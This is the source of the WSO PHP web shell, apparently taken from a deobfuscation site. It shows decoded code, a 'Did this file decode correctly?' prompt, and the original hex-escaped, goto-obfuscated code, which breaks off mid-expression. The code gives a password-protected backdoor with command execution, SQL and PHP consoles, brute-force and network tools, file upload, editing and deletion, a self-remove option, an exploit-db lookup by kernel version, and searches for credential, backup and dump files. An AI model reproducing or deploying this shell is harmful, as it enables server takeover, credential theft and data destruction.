"locate .fetchmailrc files" =>
"locate '.fetchmailrc'",
"locate backup files" =>
"locate backup",
"locate dump files" =>
"locate dump",
"locate priv files" =>
"locate priv",
];
}
goto MrsTM;
Cjo7J:
$color = "#df5";
goto LNmAT;
ocXfq:
$_COOKIE = WSOstripslashes($_COOKIE);
goto Qn_9k;
dPSqc:
if (empty($_POST["a"])) {
if (
isset($default_action) &&
function_exists("action" . $default_action)
) {
$_POST["a"] = $default_action;
} else {
$_POST["a"] = "SecInfo";
}
}
goto j2Rfu;
fj9OS:
if ($argc == 3) {
$_POST = unserialize(base64_decode($argv[1]));
$_SERVER = unserialize(base64_decode($argv[2]));
}
goto GFRHq;
MrsTM:
function wsoHeader()
{
goto E9rcc;
FKql5:
echo "<table class=info cellpadding=3 cellspacing=0 width=100%><tr><td width=1><span>Uname:<br>User:<br>Php:<br>Hdd:<br>Cwd:" .
($GLOBALS["os"] == "win"
? "<br>Drives:"
: "") .
"</span></td>" .
"<td><nobr>" .
substr(@php_uname(), 0, 120) .
" <a href="" .
$explink .
"" target=_blank>[exploit-db.com]</a></nobr><br>" .
$uid .
" ( " .
$user .
" ) <span>Group:</span> " .
$gid .
" ( " .
$group .
" )<br>" .
@phpversion() .
" <span>Safe mode:</span> " .
($GLOBALS["safe_mode"]
? "<font color=red>ON</font>"
: "<font color=green><b>OFF</b></font>") .
" <a href=# onclick="g('Php',null,'','info')">[ phpinfo ]</a> <span>Datetime:</span> " .
date("Y-m-d H:i:s") .
"<br>" .
wsoViewSize($totalSpace) .
" <span>Free:</span> " .
wsoViewSize($freeSpace) .
" (" .
(int) (($freeSpace / $totalSpace) * 100) .
"%)<br>" .
$cwd_links .
" " .
wsoPermsColor($GLOBALS["cwd"]) .
" <a href=# onclick="g('FilesMan','" .
$GLOBALS["home_cwd"] .
"','','','')">[ home ]</a><br>" .
$drives .
"</td>" .
"<td width=1 align=right><nobr><select onchange="g(null,null,null,null,null,this.value)"><optgroup label="Page charset">" .
$opt_charsets .
"</optgroup></select><br><span>Server IP:</span><br>" .
@$_SERVER["SERVER_ADDR"] .
"<br><span>Client IP:</span><br>" .
$_SERVER["REMOTE_ADDR"] .
"</nobr></td></tr></table>" .
"<table style="border-top:2px solid #333;" cellpadding=3 cellspacing=0 width=100%><tr>" .
$menu .
"</tr></table><div style="margin:5">";
goto RzURU;
M4wyI:
$m = [
"Sec. Info" => "SecInfo",
"Files" => "FilesMan",
"Console" => "Console",
"Sql" => "Sql",
"Php" => "Php",
"String tools" =>
"StringTools",
"Bruteforce" =>
"Bruteforce",
"Network" => "Network",
];
goto JIPap;
XR0lk:
$totalSpace = $totalSpace ? $totalSpace : 1;
goto gDdS4;
QoI2U:
$drives = "";
goto dJUUJ;
E9rcc:
if (empty($_POST["charset"])) {
$_POST["charset"] =
$GLOBALS[
"default_charset"
];
}
goto wwJNm;
yWMQp:
$charsets = [
"UTF-8",
"Windows-1251",
"KOI8-R",
"KOI8-U",
"cp866",
];
goto QAzn_;
JIPap:
if (!empty($GLOBALS["auth_pass"])) {
$m["Logout"] = "Logout";
}
goto hedz2;
nmRB7:
echo "<html><head><meta http-equiv='Content-Type' content='text/html; charset=" .
$_POST["charset"] .
"'><title>" .
$_SERVER["HTTP_HOST"] .
" - WSO " .
WSO_VERSION .
"</title>\xd
<style>
\xabody{background-color:#444;color:#e1e1e1;}
\xabody,td,th{ font: 9pt Lucida,Verdana;margin:0;vertical-align:top;color:#e1e1e1; }\xd\xatable.info{ color:#fff;background-color:#222; }
\xaspan,h1,a{ color: {$color} !important; }\xd
span{ font-weight: bolder; }\xd
h1{ border-left:5px solid {$color};padding: 2px 5px;font: 14pt Verdana;background-color:#222;margin:0px; }\xd
div.content{ padding: 5px;margin-left:5px;background-color:#333; }\xd\xaa{ text-decoration:none; }\xd\xaa:hover{ text-decoration:underline; }
\xa.ml1{ border:1px solid #444;padding:5px;margin:0;overflow: auto; }
.bigarea{ width:100%;height:300px; }\xd\xainput,textarea,select{ margin:0;color:#fff;background-color:#555;border:1px solid {$color}; font: 9pt Monospace,'Courier New'; }\xd
form{ margin:0px; }
\xa#toolsTbl{ text-align:center; }
\xa.toolsInp{ width: 300px }
\xa.main th{text-align:left;background-color:#5e5e5e;}\xd\xa.main tr:hover{background-color:#5e5e5e}
.l1{background-color:#444}
\xa.l2{background-color:#333}\xd
pre{font-family:Courier,Monospace;}
</style>
\xa<script>
\xa var c_ = '" .
htmlspecialchars($GLOBALS["cwd"]) .
"';\xd\xa var a_ = '" .
htmlspecialchars(@$_POST["a"]) .
"'\xd
var charset_ = '" .
htmlspecialchars(@$_POST["charset"]) .
"';\xd
var p1_ = '" .
(strpos(@$_POST["p1"], "
") !== false
? ""
: htmlspecialchars($_POST["p1"], ENT_QUOTES)) .
"';
var p2_ = '" .
(strpos(@$_POST["p2"], "
") !== false
? ""
: htmlspecialchars($_POST["p2"], ENT_QUOTES)) .
"';\xd\xa var p3_ = '" .
(strpos(@$_POST["p3"], "\xa") !== false
? ""
: htmlspecialchars($_POST["p3"], ENT_QUOTES)) .
"';
var d = document;\xd\xa\x9function set(a,c,p1,p2,p3,charset) {
\xa \x9if(a!=null)d.mf.a.value=a;else d.mf.a.value=a_;\xd\xa if(c!=null)d.mf.c.value=c;else d.mf.c.value=c_;
if(p1!=null)d.mf.p1.value=p1;else d.mf.p1.value=p1_;
\xa \x9if(p2!=null)d.mf.p2.value=p2;else d.mf.p2.value=p2_;\xd
\x9if(p3!=null)d.mf.p3.value=p3;else d.mf.p3.value=p3_;
\xa\x9\x9if(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_;\xd
}\xd\xa\x9function g(a,c,p1,p2,p3,charset) {
\x9 set(a,c,p1,p2,p3,charset);\xd\xa\x9 d.mf.submit();\xd
\x9}\xd
function a(a,c,p1,p2,p3,charset) {
set(a,c,p1,p2,p3,charset);\xd\xa \x9var params = 'ajax=true';\xd\xa\x9\x9for(i=0;i<d.mf.elements.length;i++)
\xa\x9 \x9params += '&'+d.mf.elements[i].name+'='+encodeURIComponent(d.mf.elements[i].value);\xd
\x9\x9sr('" .
addslashes($_SERVER["REQUEST_URI"]) .
"', params);
\xa\x9}\xd
\x9function sr(url, params) {\xd
\x9if (window.XMLHttpRequest)
\xa \x9 req = new XMLHttpRequest();\xd
\x9\x9else if (window.ActiveXObject)\xd\xa\x9\x9 req = new ActiveXObject('Microsoft.XMLHTTP');\xd
if (req) {\xd
req.onreadystatechange = processReqChange;\xd\xa req.open('POST', url, true);
\xa req.setRequestHeader ('Content-Type', 'application/x-www-form-urlencoded');\xd\xa req.send(params);\xd
}
\xa }
\xa\x9function processReqChange() {
if( (req.readyState == 4) )
\xa \x9\x9if(req.status == 200) {\xd
\x9\x9var reg = new RegExp("(\\d+)([\\S\\s]*)", 'm');\xd
var arr=reg.exec(req.responseText);\xd
\x9 eval(arr[2].substr(0, arr[1]));\xd\xa\x9\x9\x9} else alert('Request error!');
\xa\x9}
</script>
\xa<head><body><div style='position:absolute;width:100%;background-color:#444;top:0;left:0;'>
<form method=post name=mf style='display:none;'>\xd
<input type=hidden name=a>\xd
<input type=hidden name=c>\xd
<input type=hidden name=p1>
\xa<input type=hidden name=p2>\xd
<input type=hidden name=p3>
\xa<input type=hidden name=charset>\xd
</form>";
goto yrJci;
HJ09z:
$totalSpace = @disk_total_space($GLOBALS["cwd"]);
goto XR0lk;
mxXoN:
$explink =
"http://exploit-db.com/search/?action=search&filter_description=";
goto CGFSE;
jqLRT:
$menu = "";
goto pyClH;
znu8e:
$kernel = @php_uname("s");
goto mxXoN;
IUSK1:
for ($i = 0; $i < $n - 1; $i++) {
$cwd_links .=
"<a href='#' onclick='g("FilesMan","";
for ($j = 0; $j <= $i; $j++) {
$cwd_links .= $path[$j] . "/";
}
$cwd_links .= "")'>" . $path[$i] . "/</a>";
}
goto yWMQp;
QAzn_:
$opt_charsets = "";
goto wJ6Eu;
hedz2:
$m["Self remove"] =
"SelfRemove";
goto jqLRT;
MFEdT:
$n = count($path);
goto IUSK1;
PbU2y:
$path = explode("/", $GLOBALS["cwd"]);
goto MFEdT;
CGFSE:
if (strpos("Linux", $kernel) !== false) {
$explink .= urlencode(
"Linux Kernel " .
substr($release, 0, 6)
);
} else {
$explink .= urlencode($kernel . " " . substr($release, 0, 3));
}
goto oXY47;
yrJci:
$freeSpace = @diskfreespace($GLOBALS["cwd"]);
goto HJ09z;
pyClH:
foreach ($m as $k => $v) {
$menu .=
"<th width="" .
(int) (100 / count($m)) .
"%">[ <a href="#" onclick="g('" .
$v .
"',null,'','','')">" .
$k .
"</a> ]</th>";
}
goto QoI2U;
wJ6Eu:
foreach ($charsets as $item) {
$opt_charsets .=
"<option value="" .
$item .
"" " .
($_POST["charset"] == $item
? "selected"
: "") .
">" .
$item .
"</option>";
}
goto M4wyI;
dJUUJ:
if ($GLOBALS["os"] == "win") {
foreach (range("c", "z") as $drive) {
if (is_dir($drive . ":\")) {
$drives .=
"<a href="#" onclick="g('FilesMan','" .
$drive .
":/')">[ " .
$drive .
" ]</a> ";
}
}
}
goto FKql5;
wwJNm:
global $color;
goto nmRB7;
gDdS4:
$release = @php_uname("r");
goto znu8e;
oXY47:
if (
!function_exists("posix_getegid")
) {
goto VMtJd;
VMtJd:
$user = @get_current_user();
goto RNehq;
RNehq:
$uid = @getmyuid();
goto kWs3Y;
n3X6Y:
$group = "?";
goto dyMHz;
kWs3Y:
$gid = @getmygid();
goto n3X6Y;
dyMHz:
} else {
goto ec83q;
yJq0B:
$uid = $uid["uid"];
goto nZ1Iw;
nZ1Iw:
$group = $gid["name"];
goto LgEQ1;
LgEQ1:
$gid = $gid["gid"];
goto XEe3x;
q9aTZ:
$user = $uid["name"];
goto yJq0B;
ERGtZ:
$gid = @posix_getgrgid(posix_getegid());
goto q9aTZ;
ec83q:
$uid = @posix_getpwuid(posix_geteuid());
goto ERGtZ;
XEe3x:
}
goto HU3s7;
HU3s7:
$cwd_links = "";
goto PbU2y;
RzURU:
}
goto pXSrD;
lUvYe:
if (
!function_exists(
"posix_getgrgid"
) &&
strpos(
$GLOBALS[
"disable_functions"
],
"posix_getgrgid"
) === false
) {
function posix_getgrgid($p)
{
return false;
}
}
goto d62j5;
V8rDW:
@set_time_limit(0);
goto hd5Oa;
KCE0z:
function wsoWhich($p)
{
goto qE7x8;
bvBsL:
if (!empty($path)) {
return $path;
}
goto A0ITv;
qE7x8:
$path = wsoEx("which " . $p);
goto bvBsL;
A0ITv:
return false;
goto xhdvj;
xhdvj:
}
goto HhMRL;
guAyk:
function wsoScandir($dir)
{
if (function_exists("scandir")) {
return scandir($dir);
} else {
goto AwLVq;
hfmSV:
while (false !== ($filename = readdir($dh))) {
$files[] = $filename;
}
goto Rc9At;
Rc9At:
return $files;
goto dO6EV;
AwLVq:
$dh = opendir($dir);
goto hfmSV;
dO6EV:
}
}
goto KCE0z;
pXSrD:
function wsoFooter()
{
$is_writable = is_writable($GLOBALS["cwd"])
? " <font color='green'>(Writeable)</font>"
: " <font color=red>(Not writable)</font>";
echo "\xd\xa</div>\xd
<table class=info id=toolsTbl cellpadding=3 cellspacing=0 width=100% style='border-top:2px solid #333;border-bottom:2px solid #333;'>\xd\xa\x9<tr>
\x9\x9<td><form onsubmit='g(null,this.c.value,"");return false;'><span>Change dir:</span><br><input class='toolsInp' type=text name=c value='" .
htmlspecialchars($GLOBALS["cwd"]) .
"'><input type=submit value='>>'></form></td>
\xa \x9<td><form onsubmit="g('FilesTools',null,this.f.value);return false;"><span>Read file:</span><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td>\xd
</tr><tr>
\xa\x9 <td><form onsubmit="g('FilesMan',null,'mkdir',this.d.value);return false;"><span>Make dir:</span>{$is_writable}<br><input class='toolsInp' type=text name=d><input type=submit value='>>'></form></td>
<td><form onsubmit="g('FilesTools',null,this.f.value,'mkfile');return false;"><span>Make file:</span>{$is_writable}<br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td>
\xa\x9</tr><tr>\xd\xa <td><form onsubmit="g('Console',null,this.c.value);return false;"><span>Execute:</span><br><input class='toolsInp' type=text name=c value=''><input type=submit value='>>'></form></td>
\xa <td><form method='post' ENCTYPE='multipart/form-data'>
\xa\x9\x9<input type=hidden name=a value='FilesMAn'>
\x9 <input type=hidden name=c value='" .
$GLOBALS["cwd"] .
"'>\xd
\x9 <input type=hidden name=p1 value='uploadFile'>\xd
\x9\x9<input type=hidden name=charset value='" .
(isset($_POST["charset"])
? $_POST["charset"]
: "") .
"'>
\x9\x9<span>Upload file:</span>{$is_writable}<br><input class='toolsInp' type=file name=f><input type=submit value='>>'></form><br ></td>
\x9</tr></table></div></body></html>";
}
goto XeOpc;
Qn_9k:
function wsoLogin()
{
die(
"<pre align=center><form method=post>Password: <input type=password name=pass><input type=submit value='>>'></form></pre>"
);
}
goto e2q7d;
i6mTz:
function actionSelfRemove()
{
goto KQZY3;
trHKc:
if ($_POST["p1"] != "yes") {
wsoHeader();
}
goto X7soZ;
X7soZ:
echo "<h1>Suicide</h1><div class=content>Really want to remove the shell?<br><a href=# onclick="g(null,null,'yes')">Yes</a></div>";
goto tsvXj;
KQZY3:
if ($_POST["p1"] == "yes") {
if (
@unlink(
preg_replace(
"!\(\d+\)\s.*!",
"",
__FILE__
)
)
) {
die(
"Shell has been removed"
);
} else {
echo "unlink error!";
}
}
goto trHKc;
tsvXj:
wsoFooter();
goto n3JxC;
n3JxC:
}
goto DbGtY;
TQr3j:
if (!empty($auth_pass)) {
if (
isset($_POST["pass"]) &&
md5($_POST["pass"]) == $auth_pass
) {
WSOsetcookie(
md5($_SERVER["HTTP_HOST"]),
$auth_pass
);
}
if (
!isset(
$_COOKIE[md5($_SERVER["HTTP_HOST"])]
) ||
$_COOKIE[md5($_SERVER["HTTP_HOST"])] !=
$auth_pass
) {
wsoLogin();
}
}
goto tZUOM;
e2q7d:
function WSOsetcookie($k, $v)
{
$_COOKIE[$k] = $v;
setcookie($k, $v);
}
goto TQr3j;
yXkOt:
function wsoViewSize($s)
{
if ($s >= 1073741824) {
return sprintf("%1.2f", $s / 1073741824) . " GB";
} elseif ($s >= 1048576) {
return sprintf("%1.2f", $s / 1048576) . " MB";
} elseif ($s >= 1024) {
return sprintf("%1.2f", $s / 1024) . " KB";
} else {
return $s . " B";
}
}
goto etiAC;
Zxful:
exit();
?>
Did this file decode correctly?
Original Code
<?php
goto Cjo7J;
LqaMO:
$safe_mode = @ini_get("\x73\x61\x66\x65\137\155\157\x64\145");
goto zGahs;
zGahs:
if (!$safe_mode) {
error_reporting(0);
}
goto Gop14;
j2Rfu:
if (
!empty($_POST["\141"]) &&
function_exists("\x61\x63\164\151\157\156" . $_POST["\x61"])
) {
call_user_func("\141\x63\x74\x69\157\x6e" . $_POST["\141"]);
}
goto Zxful;
GFRHq:
@ini_set("\x65\x72\x72\157\162\137\154\157\x67", null);
goto g7ZCc;
N84uU:
function actionFilesMan()
{
goto J7jRR;
la8rp:
if (class_exists("\132\x69\160\101\x72\x63\150\151\x76\145")) {
echo "\x3c\x6f\x70\164\x69\157\x6e\x20\166\x61\x6c\x75\x65\x3d\x27\x7a\x69\160\47\76\103\x6f\x6d\160\162\145\x73\x73\40\50\172\x69\x70\51\74\x2f\157\160\x74\151\x6f\x6e\76\x3c\157\160\x74\x69\x6f\x6e\40\166\141\154\x75\x65\75\x27\x75\156\172\x69\160\47\76\125\156\143\x6f\155\160\162\145\x73\163\x20\x28\172\x69\160\x29\74\x2f\x6f\160\164\151\x6f\156\76";
}
goto GTtN3;
uO4Od:
if (!empty($_POST["\x70\61"])) {
switch ($_POST["\x70\61"]) {
case "\x75\x70\154\x6f\141\144\106\x69\154\145":
if (
!@move_uploaded_file(
$_FILES["\x66"]["\164\155\160\137\x6e\141\x6d\145"],
$_FILES["\146"]["\156\x61\155\x65"]
)
) {
echo "\103\141\x6e\47\164\40\x75\x70\x6c\x6f\141\144\x20\146\x69\x6c\x65\41";
}
break;
case "\155\x6b\144\x69\162":
if (!@mkdir($_POST["\x70\62"])) {
echo "\103\141\156\47\x74\40\x63\162\145\x61\164\145\40\x6e\x65\167\40\x64\151\162";
}
break;
case "\x64\x65\154\145\164\x65":
goto zgV_d;
mm32x:
break;
goto hEfbk;
zgV_d:
function deleteDir($path)
{
goto RrCM3;
zxeby:
$dh = opendir($path);
goto TCJ3G;
TCJ3G:
while (($item = readdir($dh)) !== false) {
$item = $path . $item;
if (
basename($item) == "\56\x2e" ||
basename($item) == "\56"
) {
continue;
}
$type = filetype($item);
if ($type == "\144\x69\162") {
deleteDir($item);
} else {
@unlink($item);
}
}
goto qhDI4;
SLRoZ:
@rmdir($path);
goto ld2N6;
RrCM3:
$path = substr($path, -1) == "\x2f" ? $path : $path . "\57";
goto zxeby;
qhDI4:
closedir($dh);
goto SLRoZ;
ld2N6:
}
goto Jstso;
Jstso:
if (is_array(@$_POST["\146"])) {
foreach ($_POST["\146"] as $f) {
goto Fce39;
jTf8C:
if (is_dir($f)) {
deleteDir($f);
} else {
@unlink($f);
}
goto sVDIO;
Fce39:
if ($f == "\56\x2e") {
continue;
}
goto NavX2;
NavX2:
$f = urldecode($f);
goto jTf8C;
sVDIO:
}
}
goto mm32x;
hEfbk:
case "\160\141\x73\x74\145":
goto aIzMf;
aIzMf:
if ($_COOKIE["\141\x63\x74"] == "\x63\x6f\x70\x79") {
function copy_paste($c, $s, $d)
{
if (is_dir($c . $s)) {
goto DXZu5;
OpM7_:
$h = @opendir($c . $s);
goto XF_lF;
XF_lF:
while (($f = @readdir($h)) !== false) {
if ($f != "\56" and $f != "\x2e\x2e") {
copy_paste(
$c . $s . "\57",
$f,
$d . $s . "\57"
);
}
}
goto v_Vn9;
DXZu5:
mkdir($d . $s);
goto OpM7_;
v_Vn9:
} elseif (is_file($c . $s)) {
@copy($c . $s, $d . $s);
}
}
foreach ($_COOKIE["\x66"] as $f) {
copy_paste(
$_COOKIE["\x63"],
$f,
$GLOBALS["\x63\x77\144"]
);
}
} elseif ($_COOKIE["\x61\143\x74"] == "\155\157\166\145") {
function move_paste($c, $s, $d)
{
if (is_dir($c . $s)) {
goto qKJrU;
TXDEI:
while (($f = @readdir($h)) !== false) {
if ($f != "\x2e" and $f != "\56\x2e") {
copy_paste(
$c . $s . "\57",
$f,
$d . $s . "\57"
);
}
}
goto xPGvS;
AwOVO:
$h = @opendir($c . $s);
goto TXDEI;
qKJrU:
mkdir($d . $s);
goto AwOVO;
xPGvS:
} elseif (@is_file($c . $s)) {
@copy($c . $s, $d . $s);
}
}
foreach ($_COOKIE["\146"] as $f) {
@rename(
$_COOKIE["\x63"] . $f,
$GLOBALS["\143\167\x64"] . $f
);
}
} elseif ($_COOKIE["\141\x63\x74"] == "\x7a\151\160") {
if (
class_exists("\132\151\160\x41\162\143\150\151\x76\145")
) {
$zip = new ZipArchive();
if ($zip->open($_POST["\160\x32"], 1)) {
goto Jun5P;
Jun5P:
chdir($_COOKIE["\x63"]);
goto T_RpN;
MVV2r:
$zip->close();
goto CqwAG;
T_RpN:
foreach ($_COOKIE["\x66"] as $f) {
if ($f == "\x2e\x2e") {
continue;
}
if (@is_file($_COOKIE["\143"] . $f)) {
$zip->addFile($_COOKIE["\x63"] . $f, $f);
} elseif (@is_dir($_COOKIE["\x63"] . $f)) {
$iterator = new RecursiveIteratorIterator(
new RecursiveDirectoryIterator(
$f . "\57"
)
);
foreach ($iterator as $key => $value) {
$zip->addFile(realpath($key), $key);
}
}
}
goto JhWjt;
JhWjt:
chdir($GLOBALS["\x63\167\x64"]);
goto MVV2r;
CqwAG:
}
}
} elseif ($_COOKIE["\141\x63\164"] == "\x75\156\x7a\x69\x70") {
if (
class_exists("\x5a\x69\x70\101\162\143\x68\151\166\x65")
) {
$zip = new ZipArchive();
foreach ($_COOKIE["\x66"] as $f) {
if ($zip->open($_COOKIE["\x63"] . $f)) {
$zip->extractTo($GLOBALS["\x63\167\x64"]);
$zip->close();
}
}
}
} elseif ($_COOKIE["\141\143\x74"] == "\164\x61\162") {
goto nrwbR;
QmWa1:
chdir($GLOBALS["\143\x77\144"]);
goto bK26y;
zHKjB:
wsoEx(
"\x74\x61\x72\x20\x63\x66\x7a\166\x20" .
escapeshellarg($_POST["\160\x32"]) .
"\40" .
implode("\x20", $_COOKIE["\x66"])
);
goto QmWa1;
BU3zr:
$_COOKIE["\x66"] = array_map(
"\x65\163\x63\141\x70\145\163\x68\x65\154\x6c\141\x72\x67",
$_COOKIE["\146"]
);
goto zHKjB;
nrwbR:
chdir($_COOKIE["\x63"]);
goto BU3zr;
bK26y:
}
goto tJ8ED;
HwZnR:
setcookie("\146", "", time() - 3600);
goto TZk2t;
TZk2t:
break;
goto yoTwQ;
tJ8ED:
unset($_COOKIE["\146"]);
goto HwZnR;
yoTwQ:
default:
if (!empty($_POST["\x70\61"])) {
goto TYMaj;
XHEG8:
WSOsetcookie("\x63", @$_POST["\x63"]);
goto Unr9o;
TYMaj:
WSOsetcookie("\141\143\164", $_POST["\x70\x31"]);
goto XUMLY;
XUMLY:
WSOsetcookie("\x66", serialize(@$_POST["\x66"]));
goto XHEG8;
Unr9o:
}
break;
}
}
goto bpziK;
JbUVa:
usort($files, "\x77\x73\x6f\x43\155\x70");
goto pBUl1;
RjKbq:
function wsoCmp($a, $b)
{
if ($GLOBALS["\x73\157\162\x74"][0] != "\163\151\172\145") {
return strcmp(
strtolower($a[$GLOBALS["\x73\x6f\x72\x74"][0]]),
strtolower($b[$GLOBALS["\163\x6f\162\x74"][0]])
) * ($GLOBALS["\x73\x6f\162\x74"][1] ? 1 : -1);
} else {
return ($a["\163\x69\x7a\145"] < $b["\163\x69\x7a\x65"] ? -1 : 1) *
($GLOBALS["\163\157\x72\x74"][1] ? 1 : -1);
}
}
goto JbUVa;
flVXx:
$GLOBALS["\x73\157\162\164"] = $sort;
goto RjKbq;
b42P7:
echo "\74\x2f\x73\x65\154\145\143\x74\x3e\46\x6e\142\x73\160\73";
goto zga6H;
QsnjB:
$dirContent = wsoScandir(
isset($_POST["\x63"]) ? $_POST["\143"] : $GLOBALS["\x63\x77\144"]
);
goto DufhY;
EoM5y:
if (!empty($_POST["\160\61"])) {
if (
preg_match(
"\x21\163\x5f\50\x5b\101\x2d\x7a\x5d\x2b\51\137\50\134\x64\173\61\175\51\x21",
$_POST["\x70\x31"],
$match
)
) {
$sort = [$match[1], (int) $match[2]];
}
}
goto uaEIV;
ecDrl:
echo "\x3c\150\x31\x3e\106\x69\x6c\x65\40\x6d\141\156\x61\x67\x65\x72\x3c\x2f\150\61\76\x3c\x64\x69\x76\40\x63\x6c\x61\163\x73\x3d\x63\157\x6e\164\145\156\x74\76\74\163\x63\x72\x69\x70\x74\x3e\160\x31\137\x3d\x70\x32\137\x3d\160\63\x5f\75\42\42\73\x3c\x2f\x73\143\162\151\160\x74\76";
goto QsnjB;
J7jRR:
if (!empty($_COOKIE["\146"])) {
$_COOKIE["\x66"] = @unserialize($_COOKIE["\146"]);
}
goto uO4Od;
zqQv8:
foreach ($files as $f) {
echo "\74\x74\162" .
($l ? "\x20\x63\154\x61\163\x73\75\154\61" : "") .
"\76\74\x74\144\76\74\151\x6e\160\x75\x74\40\x74\171\160\145\x3d\143\150\145\x63\153\x62\x6f\170\40\x6e\x61\155\145\75\42\146\133\135\42\x20\166\141\154\165\145\75\42" .
urlencode($f["\156\x61\x6d\145"]) .
"\x22\x20\143\x6c\141\163\163\75\143\150\x6b\142\x78\x3e\74\57\164\144\x3e\74\x74\x64\x3e\x3c\x61\x20\150\x72\x65\x66\x3d\43\40\x6f\x6e\x63\x6c\151\143\153\75\42" .
($f["\164\x79\160\145"] == "\146\x69\x6c\x65"
? "\x67\x28\x27\x46\151\x6c\x65\x73\124\157\x6f\154\x73\47\x2c\156\165\154\x6c\x2c\47" .
urlencode($f["\156\x61\155\x65"]) .
"\47\54\40\47\166\151\145\x77\x27\x29\42\76" .
htmlspecialchars($f["\156\141\155\x65"])
: "\147\50\47\106\151\154\145\x73\115\141\x6e\x27\x2c\47" .
$f["\160\x61\164\150"] .
"\47\x29\x3b\x22\40" .
(empty($f["\154\x69\x6e\153"])
? ""
: "\164\151\164\154\x65\x3d\47{$f["\154\151\x6e\153"]}\47") .
"\x3e\x3c\x62\76\x5b\x20" .
htmlspecialchars($f["\156\141\155\145"]) .
"\40\135\x3c\57\142\76") .
"\x3c\x2f\141\76\74\x2f\164\144\x3e\x3c\164\144\x3e" .
($f["\164\171\x70\x65"] == "\x66\151\x6c\x65"
? wsoViewSize($f["\x73\151\172\x65"])
: $f["\164\x79\160\x65"]) .
"\x3c\x2f\164\x64\76\x3c\x74\x64\x3e" .
$f["\155\x6f\x64\x69\x66\171"] .
"\x3c\57\x74\x64\76\74\x74\x64\76" .
$f["\x6f\x77\156\x65\162"] .
"\57" .
$f["\x67\162\x6f\165\160"] .
"\74\x2f\164\x64\76\x3c\x74\x64\76\74\141\x20\150\162\x65\x66\x3d\43\x20\157\156\143\x6c\x69\x63\x6b\75\x22\x67\x28\47\106\151\x6c\x65\163\x54\x6f\157\154\163\47\x2c\156\165\154\x6c\x2c\47" .
urlencode($f["\x6e\141\155\145"]) .
"\47\54\47\x63\x68\155\157\x64\47\x29\x22\x3e" .
$f["\x70\145\x72\155\x73"] .
"\x3c\57\164\x64\x3e\x3c\164\x64\76\74\141\40\x68\162\x65\x66\x3d\x22\x23\x22\x20\x6f\156\143\154\151\x63\153\x3d\x22\x67\50\x27\x46\x69\154\145\x73\x54\157\x6f\x6c\163\47\x2c\156\x75\x6c\154\54\x27" .
urlencode($f["\x6e\x61\x6d\x65"]) .
"\x27\x2c\x20\x27\x72\145\156\x61\155\145\x27\51\x22\x3e\122\x3c\57\x61\x3e\x20\x3c\141\x20\150\162\145\146\75\x22\43\x22\x20\x6f\156\143\x6c\151\143\153\75\42\x67\x28\47\x46\151\154\145\x73\x54\157\157\x6c\x73\x27\x2c\156\165\154\x6c\x2c\47" .
urlencode($f["\x6e\141\155\x65"]) .
"\47\x2c\x20\47\164\x6f\165\143\150\47\51\42\x3e\124\x3c\57\x61\76" .
($f["\x74\x79\x70\x65"] == "\146\151\154\x65"
? "\x20\74\141\40\x68\x72\145\146\75\42\43\42\40\x6f\x6e\143\x6c\x69\x63\153\x3d\42\x67\50\47\106\151\x6c\145\x73\124\157\157\154\x73\x27\54\x6e\165\154\154\54\47" .
urlencode($f["\x6e\141\155\x65"]) .
"\x27\x2c\40\x27\145\144\151\164\x27\x29\x22\x3e\x45\x3c\57\141\76\x20\74\141\x20\150\162\145\x66\75\42\x23\x22\40\157\156\x63\x6c\x69\x63\x6b\x3d\42\x67\x28\x27\x46\151\154\145\163\x54\x6f\157\154\x73\47\54\156\x75\x6c\x6c\54\x27" .
urlencode($f["\x6e\x61\155\x65"]) .
"\x27\54\40\47\144\x6f\x77\x6e\154\x6f\141\144\x27\51\x22\76\104\x3c\57\141\76"
: "") .
"\74\x2f\164\x64\x3e\x3c\x2f\x74\x72\x3e";
$l = $l ? 0 : 1;
}
goto b9q_L;
ICFmG:
$l = 0;
goto zqQv8;
TSLht:
$n = count($dirContent);
goto p625P;
lC5LC:
$dirs = $files = [];
goto TSLht;
uaEIV:
echo "\74\163\143\x72\151\160\x74\x3e\xd\12\11\x66\x75\x6e\x63\x74\x69\157\156\40\x73\x61\x28\51\40\173\15\12\11\11\x66\x6f\162\50\x69\x3d\60\x3b\151\x3c\x64\56\146\151\154\145\163\56\x65\x6c\x65\155\145\x6e\x74\x73\56\154\x65\156\147\164\150\73\x69\53\x2b\51\15\12\x9\11\11\151\x66\x28\x64\56\146\151\x6c\x65\163\x2e\x65\154\145\155\145\x6e\164\163\x5b\151\x5d\56\164\171\x70\x65\x20\75\x3d\40\47\x63\x68\145\143\153\142\157\x78\47\51\xd\xa\11\x9\11\11\144\56\146\151\154\145\163\x2e\145\154\x65\x6d\x65\x6e\164\163\x5b\151\x5d\x2e\143\x68\145\143\153\x65\x64\40\x3d\x20\144\x2e\x66\151\154\x65\x73\x2e\x65\154\145\155\x65\x6e\x74\163\133\x30\135\56\143\x68\x65\x63\x6b\x65\x64\x3b\xd\xa\11\x7d\xd\xa\74\57\163\x63\162\151\x70\164\76\15\12\x3c\164\x61\142\x6c\145\x20\167\151\x64\x74\x68\x3d\47\x31\60\60\45\47\x20\x63\154\141\x73\163\75\x27\155\x61\x69\156\x27\x20\143\x65\x6c\154\163\160\x61\143\151\156\x67\75\47\x30\47\40\x63\145\154\x6c\160\x61\144\144\151\x6e\x67\x3d\x27\x32\47\x3e\xd\12\x3c\146\157\162\x6d\x20\156\141\x6d\x65\x3d\146\151\x6c\145\x73\x20\155\145\x74\150\157\x64\75\160\157\163\x74\x3e\74\164\x72\76\x3c\x74\150\x20\x77\x69\144\x74\x68\75\x27\x31\x33\x70\170\47\x3e\x3c\x69\156\160\165\164\x20\x74\x79\x70\x65\75\143\x68\x65\x63\x6b\x62\x6f\x78\x20\157\156\143\x6c\151\x63\x6b\x3d\x27\x73\141\x28\x29\x27\40\x63\154\141\x73\x73\75\x63\150\x6b\142\170\76\74\x2f\x74\x68\x3e\x3c\164\150\76\x3c\x61\x20\150\x72\145\146\75\x27\43\47\40\x6f\x6e\x63\x6c\x69\143\153\x3d\47\147\x28\x22\106\151\x6c\x65\163\x4d\x61\156\42\x2c\x6e\x75\x6c\154\54\x22\x73\137\x6e\141\155\145\x5f" .
($sort[1] ? 0 : 1) .
